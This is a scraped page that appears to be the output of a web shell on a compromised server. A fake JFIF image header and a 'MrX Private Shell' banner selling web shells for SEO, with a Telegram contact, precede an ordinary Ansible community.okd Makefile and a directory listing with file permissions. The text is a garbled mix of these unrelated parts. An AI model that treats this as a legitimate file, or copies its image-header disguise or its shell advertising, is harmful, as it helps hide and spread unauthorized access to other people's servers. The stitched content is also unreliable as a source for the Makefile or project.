����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
.PHONY: molecule
# Also needs to be updated in galaxy.yml
VERSION = 2.3.0
SANITY_TEST_ARGS ?= --docker --color
UNITS_TEST_ARGS ?= --docker --color
PYTHON_VERSION ?= `python3 -c 'import platform; print("{0}.{1}".format(platform.python_version_tuple()[0], platform.python_version_tuple()[1]))'`
clean:
rm -f community-okd-$(VERSION).tar.gz
rm -f redhat-openshift-$(VERSION).tar.gz
rm -rf ansible_collections
build: clean
ansible-galaxy collection build
install: build
ansible-galaxy collection install -p ansible_collections community-okd-$(VERSION).tar.gz
sanity: install
cd ansible_collections/community/okd && ansible-test sanity -v --python $(PYTHON_VERSION) $(SANITY_TEST_ARGS)
units: install
cd ansible_collections/community/okd && ansible-test units -v --python $(PYTHON_VERSION) $(UNITS_TEST_ARGS)
molecule: install
molecule test
test-integration: upstream-test-integration downstream-test-integration
test-sanity: upstream-test-sanity downstream-test-sanity
test-units: upstream-test-units downstream-test-units
test-integration-incluster:
./ci/incluster_integration.sh
upstream-test-sanity: sanity
upstream-test-units: units
upstream-test-integration: molecule
downstream-test-sanity:
./ci/downstream.sh -s
downstream-test-units:
./ci/downstream.sh -u
downstream-test-integration:
./ci/downstream.sh -i
downstream-build:
./ci/downstream.sh -b
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| changelogs | Folder | 0755 |
|
|
| meta | Folder | 0755 |
|
|
| molecule | Folder | 0755 |
|
|
| plugins | Folder | 0755 |
|
|
| CHANGELOG.rst | File | 6.3 KB | 0644 |
|
| CONTRIBUTING.md | File | 3.19 KB | 0644 |
|
| FILES.json | File | 29.65 KB | 0644 |
|
| MANIFEST.json | File | 976 B | 0644 |
|
| Makefile | File | 1.35 KB | 0644 |
|
| OWNERS | File | 136 B | 0644 |
|
| OWNERS_ALIASES | File | 291 B | 0644 |
|
| codecov.yml | File | 107 B | 0644 |
|
| requirements.txt | File | 37 B | 0644 |
|
| requirements.yml | File | 62 B | 0644 |
|
| setup.cfg | File | 50 B | 0644 |
|
| test-requirements.txt | File | 50 B | 0644 |
|